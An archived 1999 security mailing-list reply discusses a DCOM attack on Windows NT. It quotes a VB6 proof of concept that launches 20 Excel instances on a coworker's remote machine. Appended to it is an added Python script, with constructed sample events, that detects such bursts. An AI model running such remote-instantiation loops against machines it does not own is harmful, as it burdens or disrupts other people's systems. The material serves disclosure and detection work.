Re: FW: DCOM attack against NT using VB6

From: Max Vision (visionat_private)
Date: Thu Aug 19 1999 - 17:39:02 PDT


    Hi,
    
    Did you have credentials to authenticate to your coworker's machines?  I
    was able to create arbitrary files remotely on other NT machines in my
    network using DCOM/Word/Create, but soon discovered that this was because
    I had domain admin credentials that were valid for each host.  I.e., DCOM
    attacks aren't effective if you don't have authentication credentials.
    
    If you have contrary information please let us know :)  I could be
    mistaken, since ISS does a test for non-admin access to DCOM..  What are
    the chances ISS/NAI want to give full disclosure on their DCOM compromise
    technique?
    
    Required reading:
    
     Understanding the DCOM Wire Protocol by Analyzing Network Data Packets
     http://www.guyeddon.com/MSJ3-98.htm
    
     Using Distributed COM with Firewalls
     http://www.iapetus.com/dcom/dcomfw.htm
    
    Max Vision
    http://maxvision.net/
    
    On Wed, 18 Aug 1999, Hargett, Matt wrote:
    > -----Original Message-----
    > From: Rob Lempke [mailto:rlempkeat_private]
    > Sent: Wednesday, August 11, 1999 1:27 PM
    > To: NTBUGTRAQat_private
    > Subject: DCOM attack against NT using VB6
    >
    >
    > Using the code below I was able to create 20 instances of Excel on my
    > co-workers' machines without modifying their machines at all.  The target
    > must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
    > prevent the attack.
    >
    > Private Sub Command1_Click()
    >     Dim xlObj As Object
    >     Dim xlCollection As New Collection
    >     Dim i As Long
    >     For i = 1 To 20
    >         Set xlObj = CreateObject("Excel.Application", "\\NTBox")
    >         xlCollection.Add xlObj
    >     Next i
    >
    >     i = 1
    >     'clean up
    >     While xlCollection.Count > 0
    >         xlCollection.Remove (xlCollection.Count)
    >     Wend
    >     Set xlCollection = Nothing
    > End Sub
    >
    > -Robert E. Lempke
    > --------------------------------------------
    > Steven Wright one Liners:
    > "Black holes are where God divided by zero."
    > "Quantum Mechanics:  The dreams stuff is made of."
    > "Early bird gets the worm, but the second mouse gets the cheese."
    > "If everything seems to be going well, you have obviously overlooked
    > something."
    > "Join the Army, meet interesting people, kill them."
    > "Success always occurs in private, and failure in full view."
    > "Ambition is a poor excuse for not having enough sense to be lazy."
    > "Hard work pays off in the future.  Laziness pays off now."
    > "Everyone has a photographic memory.  Some don't have film."
    > "Drink until she's cute, but stop before the wedding."
    > --------------------------------------------
    >
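The remote `CreateObject` loop quoted above makes the target start Excel through the COM launcher rather than a user shell, which gives defenders a signature to look for. The following is an added example, not part of the original thread: it flags bursts of COM-activated Office processes in process-creation logs. It assumes current Windows telemetry (parent `svchost.exe -k DcomLaunch`, `-Embedding` on the command line), not the NT 4.0 SP3/SP4 systems discussed here; the event field names and all sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE = ("excel.exe", "winword.exe")

def is_dcom_activation(ev):
    """True when an Office binary was started by the COM launcher, not a user shell."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    return (image in OFFICE
            and "-embedding" in ev["cmdline"].lower()
            and "dcomlaunch" in ev["parent_cmdline"].lower())

def find_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Return {host: peak count} for hosts with >= threshold activations in one window."""
    per_host = defaultdict(list)
    for ev in events:
        if is_dcom_activation(ev):
            per_host[ev["host"]].append(datetime.fromisoformat(ev["time"]))
    alerts = {}
    for host, times in per_host.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # Slide the window start forward until it spans at most `window`.
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[host] = peak
    return alerts

def make_event(host, second, parent_cmdline, cmdline):
    """Build one constructed process-creation record (hypothetical field names)."""
    return {"time": f"2024-01-10T09:00:{second:02d}", "host": host,
            "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
            "cmdline": cmdline, "parent_cmdline": parent_cmdline}

# Constructed sample data: 20 COM-launched Excel instances on NTBOX (the pattern
# in the quoted post), one on WS02, and one interactive launch from explorer.exe.
DCOM = r"C:\Windows\System32\svchost.exe -k DcomLaunch -p"
SAMPLE = [make_event("NTBOX", s, DCOM, "EXCEL.EXE /automation -Embedding") for s in range(20)]
SAMPLE.append(make_event("WS02", 5, DCOM, "EXCEL.EXE /automation -Embedding"))
SAMPLE.append(make_event("NTBOX", 30, r"C:\Windows\explorer.exe", "EXCEL.EXE report.xlsx"))

if __name__ == "__main__":
    print(find_bursts(SAMPLE))
```

Correlating each alert with the network logon that preceded it on the same host shows which account's credentials were used for the activation.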
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:31 PDT